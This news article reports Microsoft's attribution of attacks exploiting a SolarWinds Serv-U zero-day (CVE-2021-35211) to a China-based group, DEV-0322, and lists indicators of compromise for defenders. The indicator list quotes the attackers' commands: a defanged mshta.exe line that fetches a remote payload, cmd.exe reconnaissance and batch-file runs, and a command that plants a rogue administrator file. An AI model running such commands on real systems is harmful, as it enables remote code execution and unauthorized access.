Getty Images
Microsoft said Tuesday that China-based hackers with a history of attacking software companies and the US defense industry exploited a zero-day vulnerability in a SolarWinds product.
SolarWinds announced the zero-day on Monday after receiving a notification from Microsoft that it had discovered that a previously unknown vulnerability in the SolarWinds Serv-U product line was being actively exploited. Austin, Texas-based SolarWinds did not provide details about the threat actor behind the attacks or how their attack worked.
Commercial VPNs and compromised consumer routers
On Tuesday, Microsoft said it is referring to the hacking group as “DEV-0322” for now. “DEV” refers to a “development group” studied before Microsoft researchers have much confidence in the origin or identity of the actor behind an operation. The company said the attackers are physically located in China and often rely on botnets made up of routers or other types of IoT devices.
“MSTIC has observed DEV-0322 targeting entities in the US defense industrial base sector and software companies,” researchers from the Microsoft Threat Intelligence Center wrote in a post. “This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure.”
Microsoft did not say whether DEV-0322 was aimed at software companies, defense contractors or other types of targets.
In addition to the three attacker-affiliated servers already disclosed by SolarWinds, Microsoft has provided three additional indicators that people can use to determine if they have been hacked. The indicators of compromise are:
- 98[.]176[.]196[.]89
- 68[.]235[.]178[.]32
- 208[.]113[.]35[.]58
- 144[.]34[.]179[.]162
- 97[.]77[.]97[.]58
- hxxp://144[.]34[.]179[.]162/a
- C:\Windows\Temp\Serv-U.bat
- C:\Windows\Temp\test\current.dmp
- The presence of suspicious exception errors, particularly in the DebugSocketlog.txt log file
- C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
- cmd.exe /c whoami > “./Client/Common/redacted.txt”
- cmd.exe /c dir > “.\Client\Common\redacted.txt”
- cmd.exe /c “C:\Windows\Temp\Serv-U.bat”
- powershell.exe C:\Windows\Temp\Serv-U.bat
- cmd.exe /c type \\redacted\redacted.Archive > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive”
Tuesday’s post also included new technical details about the attack. Specific:
We observed that DEV-0322 redirected the output of their cmd.exe commands to files in the Serv-U \Client\Common\ directory, which is accessible over the Internet by default, so that the attackers could retrieve the results of the commands. The actor also appeared to add a new global user to Serv-U, effectively adding himself as a Serv-U administrator, by manually creating a crafted .Archive file in the Global Users directory. Serv-U user information is stored in these .Archive files.
Due to the way DEV-0322 had written their code, when the exploit successfully compromises the Serv-U process, an exception is thrown and logged in a Serv-U log file, DebugSocketLog.txt. The process may also crash after a malicious command is executed.
By reviewing telemetry, we identified features of the exploit, but no root-cause vulnerability. MSTIC worked with the Microsoft Offensive Security Research team, who performed vulnerability research on the Serv-U binary and identified the vulnerability through black box analysis. After a root cause was found, we reported the vulnerability to SolarWinds, who responded quickly to understand the issue and build a patch.
The zero-day vulnerability, tracked as CVE-2021-35211, resides in SolarWinds’ Serv-U product, which customers use to transfer files over networks. When the Serv-U SSH is exposed to the Internet, exploits allow attackers to remotely execute malicious code with high system privileges. From there, attackers can install and execute malicious payloads, or they can view and modify data.
SolarWinds became an overnight household name in late December when investigators discovered it was at the center of a supply chain attack with global reach. After compromising SolarWinds’ software building system, the attackers used their access to push a malicious update to about 18,000 customers of the company’s Orion network management tool.
Of those 18,000 customers, about nine of them in US government agencies and about 100 of them in the private sector received follow-up malware. The federal government has attributed the attacks to the Russian Foreign Intelligence Service, abbreviated SVR. For more than a decade, the SVR has been running malware campaigns targeting governments, political think tanks, and other organizations around the world.
The zero-day attacks that Microsoft discovered and reported are unrelated to the Orion supply chain attack.
SolarWinds patched the vulnerability over the weekend. Anyone using a vulnerable version of Serv-U should update immediately and check for signs of compromise.